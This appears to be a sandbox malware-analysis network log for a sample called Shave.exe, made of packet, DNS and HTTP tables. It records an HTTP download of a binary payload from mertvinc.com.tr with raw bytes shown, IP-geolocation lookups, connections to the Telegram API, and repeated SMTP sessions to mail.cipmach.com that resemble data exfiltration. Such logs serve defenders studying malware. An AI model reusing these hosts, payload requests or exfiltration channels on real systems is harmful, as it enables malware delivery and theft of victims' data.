                                                                                                                              Nov 25, 2024 07:09:23.378407955 CET44349859172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:23.378488064 CET49859443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:23.378731966 CET49859443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:23.378747940 CET44349859172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:23.426517010 CET4985780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:24.635885000 CET44349859172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:24.637440920 CET49859443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:24.637527943 CET44349859172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:25.091128111 CET44349859172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:25.091197014 CET44349859172.67.177.134192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:25.091267109 CET49859443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:25.115351915 CET49859443192.168.2.5172.67.177.134
                                                                                                                              Nov 25, 2024 07:09:25.145390987 CET4985780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:25.265171051 CET8049857193.122.130.0192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:25.265228987 CET4985780192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:25.284524918 CET49865443192.168.2.5149.154.167.220
                                                                                                                              Nov 25, 2024 07:09:25.284553051 CET44349865149.154.167.220192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:25.284615993 CET49865443192.168.2.5149.154.167.220
                                                                                                                              Nov 25, 2024 07:09:25.284990072 CET49865443192.168.2.5149.154.167.220
                                                                                                                              Nov 25, 2024 07:09:25.285003901 CET44349865149.154.167.220192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:26.762130022 CET44349865149.154.167.220192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:26.762227058 CET49865443192.168.2.5149.154.167.220
                                                                                                                              Nov 25, 2024 07:09:26.763967991 CET49865443192.168.2.5149.154.167.220
                                                                                                                              Nov 25, 2024 07:09:26.763978958 CET44349865149.154.167.220192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:26.764202118 CET44349865149.154.167.220192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:26.765729904 CET49865443192.168.2.5149.154.167.220
                                                                                                                              Nov 25, 2024 07:09:26.807333946 CET44349865149.154.167.220192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:27.283773899 CET44349865149.154.167.220192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:27.283838034 CET44349865149.154.167.220192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:27.283885002 CET49865443192.168.2.5149.154.167.220
                                                                                                                              Nov 25, 2024 07:09:27.287926912 CET49865443192.168.2.5149.154.167.220
                                                                                                                              Nov 25, 2024 07:09:32.935693026 CET4977980192.168.2.5193.122.130.0
                                                                                                                              Nov 25, 2024 07:09:34.283971071 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:34.403430939 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:34.407120943 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:35.713319063 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:35.713610888 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:35.833054066 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:36.107814074 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:36.108850002 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:36.228426933 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:36.503189087 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:36.503429890 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:36.623008013 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:37.025199890 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:37.025454998 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:37.145052910 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:37.421365976 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:37.421561003 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:37.541027069 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:37.854011059 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:37.854224920 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:37.973777056 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:38.252501965 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:38.253101110 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:38.253148079 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:38.253189087 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:38.253202915 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:38.372525930 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:38.372545958 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:38.372800112 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:38.372812986 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:38.752681017 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:38.754858017 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:38.874293089 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:39.350253105 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:39.350368977 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:39.350442886 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:39.350442886 CET49886587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:39.351444960 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:39.469870090 CET58749886199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:39.470885992 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:39.470978022 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:40.791296959 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:40.791568995 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:40.911108971 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:41.186019897 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:41.186201096 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:41.305798054 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:41.580845118 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:41.581089020 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:41.700645924 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:42.012026072 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:42.012243986 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:42.132164955 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:42.406829119 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:42.406996965 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:42.526535034 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:42.838032007 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:42.838196039 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:42.957676888 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.232280970 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.233573914 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233644962 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233670950 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233705997 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233752966 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233783007 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233807087 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233830929 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233850956 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.233875990 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:43.353053093 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353080034 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353111982 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353202105 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353318930 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353331089 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353339911 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353385925 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353396893 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.353405952 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.636759996 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:43.676608086 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:45.156111956 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:45.275593042 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:45.751384020 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:45.751548052 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:45.751571894 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:45.751599073 CET49898587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:45.752625942 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:45.871001005 CET58749898199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:45.872076035 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:45.872154951 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:47.061172962 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:47.061311960 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:47.180888891 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:47.437448978 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:47.437622070 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:47.557056904 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:48.019036055 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:48.019325018 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:48.139138937 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:48.397633076 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:48.397772074 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:48.517406940 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:48.773571968 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:48.777089119 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:48.896881104 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:49.209161997 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:49.209316015 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:49.328788042 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:49.585128069 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:49.585431099 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:49.585535049 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:49.585572004 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:49.585587978 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:49.585777998 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:49.704925060 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:49.705013037 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:49.705028057 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:49.705037117 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:49.705141068 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:50.068130970 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:50.069581032 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:50.189016104 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:50.646209002 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:50.646322966 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:50.646363020 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:50.646410942 CET49913587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:50.647236109 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:50.765918970 CET58749913199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:50.766822100 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:50.766920090 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:52.019323111 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:52.019478083 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:52.139410019 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:52.403913975 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:52.404251099 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:52.523727894 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:52.788863897 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:52.807799101 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:52.927331924 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:53.194047928 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:53.194350004 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:53.313815117 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:53.578747034 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:53.578918934 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:53.698388100 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.016118050 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.017061949 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.136554003 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.401535034 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.405173063 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.405239105 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.405239105 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.405282974 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.405375004 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.405375004 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.405375004 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.405431986 CET49925587192.168.2.5199.79.63.24
                                                                                                                              Nov 25, 2024 07:09:54.524626970 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.524682045 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.524693012 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.524888039 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.524898052 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.524908066 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.525023937 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.525033951 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.525042057 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.525053978 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.799392939 CET58749925199.79.63.24192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:54.848511934 CET49925587192.168.2.5199.79.63.24
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 25, 2024 07:08:39.852623940 CET5520553192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 07:08:40.866555929 CET5520553192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 07:08:41.037673950 CET53552051.1.1.1192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:41.037687063 CET53552051.1.1.1192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:44.351557016 CET5613553192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 07:08:44.490278959 CET53561351.1.1.1192.168.2.5
                                                                                                                              Nov 25, 2024 07:08:49.371078014 CET6100453192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 07:08:49.511991978 CET53610041.1.1.1192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:25.145935059 CET6383453192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 07:09:25.283875942 CET53638341.1.1.1192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:33.158169985 CET6285253192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 07:09:34.160964966 CET6285253192.168.2.51.1.1.1
                                                                                                                              Nov 25, 2024 07:09:34.282994032 CET53628521.1.1.1192.168.2.5
                                                                                                                              Nov 25, 2024 07:09:34.297743082 CET53628521.1.1.1192.168.2.5
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Nov 25, 2024 07:08:39.852623940 CET192.168.2.51.1.1.10x9df6Standard query (0)mertvinc.com.trA (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:40.866555929 CET192.168.2.51.1.1.10x9df6Standard query (0)mertvinc.com.trA (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:44.351557016 CET192.168.2.51.1.1.10x43c9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:49.371078014 CET192.168.2.51.1.1.10x77b5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:09:25.145935059 CET192.168.2.51.1.1.10x6bb0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:09:33.158169985 CET192.168.2.51.1.1.10x2825Standard query (0)mail.cipmach.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:09:34.160964966 CET192.168.2.51.1.1.10x2825Standard query (0)mail.cipmach.comA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Nov 25, 2024 07:08:41.037673950 CET1.1.1.1192.168.2.50x9df6No error (0)mertvinc.com.tr185.244.144.68A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:41.037687063 CET1.1.1.1192.168.2.50x9df6No error (0)mertvinc.com.tr185.244.144.68A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:44.490278959 CET1.1.1.1192.168.2.50x43c9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:44.490278959 CET1.1.1.1192.168.2.50x43c9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:44.490278959 CET1.1.1.1192.168.2.50x43c9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:44.490278959 CET1.1.1.1192.168.2.50x43c9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:44.490278959 CET1.1.1.1192.168.2.50x43c9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:44.490278959 CET1.1.1.1192.168.2.50x43c9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:49.511991978 CET1.1.1.1192.168.2.50x77b5No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:08:49.511991978 CET1.1.1.1192.168.2.50x77b5No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:09:25.283875942 CET1.1.1.1192.168.2.50x6bb0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:09:34.282994032 CET1.1.1.1192.168.2.50x2825No error (0)mail.cipmach.com199.79.63.24A (IP address)IN (0x0001)false
                                                                                                                              Nov 25, 2024 07:09:34.297743082 CET1.1.1.1192.168.2.50x2825No error (0)mail.cipmach.com199.79.63.24A (IP address)IN (0x0001)false
                                                                                                                              • reallyfreegeoip.org
                                                                                                                              • api.telegram.org
                                                                                                                              • mertvinc.com.tr
                                                                                                                              • checkip.dyndns.org
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.549751185.244.144.68807044C:\Users\user\Desktop\Shave.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 25, 2024 07:08:41.167156935 CET182OUTGET /oxzGOftLtQcGlWZ214.bin HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Host: mertvinc.com.tr
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Nov 25, 2024 07:08:42.598359108 CET299INHTTP/1.1 200 OK
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Last-Modified: Wed, 20 Nov 2024 22:29:52 GMT
                                                                                                                              Etag: "43a40-673e62e0-9205f093e5c5f5a8;;;"
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 277056
                                                                                                                              Date: Mon, 25 Nov 2024 05:15:06 GMT
                                                                                                                              Server: LiteSpeed
                                                                                                                              X-Powered-By: PleskLin
                                                                                                                              Nov 25, 2024 07:08:42.598884106 CET1236INData Raw: da 0c 4a 4c a8 52 8a 1c d7 69 b5 d8 69 b3 62 c2 a2 2c 83 f7 2e 66 d6 7e 68 6e 27 44 1f 0f 21 ff d7 b7 fe 28 ff e4 76 be f4 e5 ee 5b c4 63 27 b1 57 75 49 d4 66 17 df 35 da 5b 90 5b 1a 66 a0 c8 51 df 0e 80 48 fb 84 0a b4 3c c6 89 a1 e1 64 25 8c f2
                                                                                                                              Data Ascii: JLRiib,.f~hn'D!(v[c'WuIf5[[fQH<d%(-&[S(?!{a,9tFmZLbMo?y<B"6"{;aRi]LqYF#Fzo'Fa^bm@GZc*Kbq2|osG=
                                                                                                                              Nov 25, 2024 07:08:42.598901987 CET1236INData Raw: ec 1f d4 6e 9e ee c3 37 4f f6 da 0a c5 92 55 b2 df b0 bb 1d 58 6a da 9c 51 5c 25 73 e9 0f 34 5d a5 c8 dc a0 95 02 f2 75 c0 83 58 75 3d e6 0f a7 0f 77 47 26 20 6b b7 86 60 0b 97 57 af 12 1b 99 cf 21 3e c0 ad 68 9f 73 16 33 17 31 9b f7 8b e2 67 a6
                                                                                                                              Data Ascii: n7OUXjQ\%s4]uXu=wG& k`W!>hs31gkAwg(/1Zag{\w}Qz/2TlYf<iC$X +j:&k/+~to%#yOYDd3r=9Le@Pg`iz3#
                                                                                                                              Nov 25, 2024 07:08:42.598913908 CET1236INData Raw: 9e ee 1a b0 b3 53 ed 07 a9 71 c6 3f 14 5b 5e f7 50 58 45 77 1a 18 61 66 a7 a3 83 14 96 08 62 5c f6 d0 55 83 dd c3 b6 79 65 eb 82 4a b7 83 74 93 ab 64 ff 51 86 e2 71 b8 ce b7 a6 4e 3c 20 9f 7e 3c 63 1f 84 22 a6 db 27 a2 1b 03 f2 43 48 70 0f 9e 58
                                                                                                                              Data Ascii: Sq?[^PXEwafb\UyeJtdQqN< ~<c"'CHpX'#sO'b!+_+%T0T/[z~aD37^%K,Cb^?fc{fPx4DBqP&3vzf9Jep
                                                                                                                              Nov 25, 2024 07:08:42.598927021 CET492INData Raw: 29 83 ab ff 41 e5 da 9f b3 ac 3d 6e 11 18 80 29 37 cb 99 d8 2e cc 31 a1 88 06 ad 15 a0 57 0a 81 c1 91 48 7f ea e1 df 1a ba ad a0 21 b7 06 ee c6 f3 f7 76 51 ac 6b 1d 8b 96 39 b5 a9 b8 8e bf 84 54 68 0b 86 8a 14 85 3b b3 5f ac d2 3d 21 f2 2a fc fc
                                                                                                                              Data Ascii: )A=n)7.1WH!vQk9Th;_=!*W@OboCz.'g$;?bO[x}1Oi*@j`t]pxz=`IM/qh[{/tG :m9;@}015Cu4<iGwN~Zak
                                                                                                                              Nov 25, 2024 07:08:42.599153042 CET1236INData Raw: ff 85 44 47 d6 12 16 62 09 10 8a eb f4 d8 4b f2 bd 9c 82 62 ab 0a 9a 7e b7 06 e5 86 0d d9 dd de 56 cd 5e de e5 f6 c7 ba 85 f3 0c 41 8d df 13 8d 33 97 00 ec 8e 66 6e 04 cf 11 1e 09 90 9d 87 48 77 65 fd ae 3d 05 83 64 5a 90 23 58 06 35 a9 89 38 7d
                                                                                                                              Data Ascii: DGbKb~V^A3fnHwe=dZ#X58})4?Bep#Qe/a'XJHW"t=2N9|f:3T?~X{4UEC]^R'"A\x|<h:j@7ED?R4\yw%q)/o
                                                                                                                              Nov 25, 2024 07:08:42.599208117 CET1236INData Raw: a6 7d 7f 15 a1 0c a8 4f a1 39 66 af b5 47 c2 88 22 7b a5 bb fd 73 c4 fb dc e5 58 a8 99 93 3c fd 83 60 8b 86 e3 77 c4 a1 70 03 04 65 ae 8a c9 f9 f0 82 0d df 9f 74 55 b0 9f 47 33 39 aa 2d a0 49 08 3a 22 20 45 71 e0 3a 08 e0 01 25 39 c5 69 de 47 f9
                                                                                                                              Data Ascii: }O9fG"{sX<`wpetUG39-I:" Eq:%9iG=IPaitT6`}!k3e>~X.83A4h77lfT \f_L1}[.%Lw9}J'{X_
